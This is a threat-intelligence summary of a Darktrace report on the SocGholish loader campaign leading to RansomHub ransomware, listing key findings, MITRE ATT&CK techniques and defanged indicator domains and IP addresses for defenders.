Threat Research

Campaign TrailSocGholish: From loader and C2 activity to RansomHub deploymentbyChristina Kreza

DarkTrace
Campaign TrailSocGholish: From loader and C2 activity to RansomHub deploymentbyChristina Kreza
EXTRACT IOC
Ransomware attacks are evolving, increasingly utilizing affiliate models with initial access brokers, notably using the SocGholish malware. This loader delivers dangerous payloads, leading to RansomHub ransomware deployments and exploiting legacy protocols for credential access.
Affected: ransomware sector, corporate environments

Keypoints :

  • Ransomware operations increasingly use compartmentalized affiliate models.
  • SocGholish is a loader malware utilized for initial access through compromised websites.
  • Targeted websites often include outdated CMS platforms like WordPress.
  • SocGholish leads to connections with RansomHub ransomware.
  • Malware uses obfuscated code and TDS to evade detection.
  • Credential access tactics include exploiting WebDAV and malicious SCF file interactions.
  • Attackers leverage legacy protocols to extract NTLM hashes.
  • Innovative post-exploitation practices are evident, including lateral movement.

MITRE Techniques :

  • Credential Access – T1187: Forced Authentication through WebDAV exploits NTLM.
  • Credential Access – T1110: Brute Force authentication attempts observed.
  • Command and Control – T1071.001: Utilization of Web Protocols for C2 communication.
  • Command and Control – T1571: Non-Standard Port usage for evading detection.
  • Discovery – T1083: File and Directory Discovery conducted for internal recon.
  • Discovery – T1018: Remote System Discovery executed post-infection.
  • Discovery – T1046: Network Service Discovery to establish lateral movement.
  • Discovery – T1135: Network Share Discovery to exploit shared resources.
  • Execution – T1059.007: JavaScript execution for malicious payload delivery.
  • Lateral Movement – T1021.002: Utilization of SMB/Windows Admin Shares for lateral movement.
  • Resource Deployment – T1608.004: Drive-By targeting for initial access.

Indicator of Compromise :

  • [Domain] garagebevents[.]com (IP: 35.203.175[.]30) – Possibly compromised website
  • [Domain] packedbrick[.]com (IP: 176.53.147[.]97) – Keitaro TDS domain for SocGholish Delivery
  • [Domain] rednosehorse[.]com (IP: 176.53.147[.]97) – Keitaro TDS domain for SocGholish Delivery
  • [Domain] blackshelter[.]org (IP: 176.53.147[.]97) – Keitaro TDS domain for SocGholish Delivery
  • [Domain] blacksaltys[.]com (IP: 176.53.147[.]97) – Keitaro TDS domain for SocGholish Delivery

Full Story: https://darktrace.com/blog/socgholish-from-loader-and-c2-activity-to-ransomhub-deployment

Views: 33

Tags: WINDOWS, HUNTING, EXPLOIT, PAYLOAD, DEFENSE EVASION, DISCOVERY, BROWSER, LATERAL MOVEMENT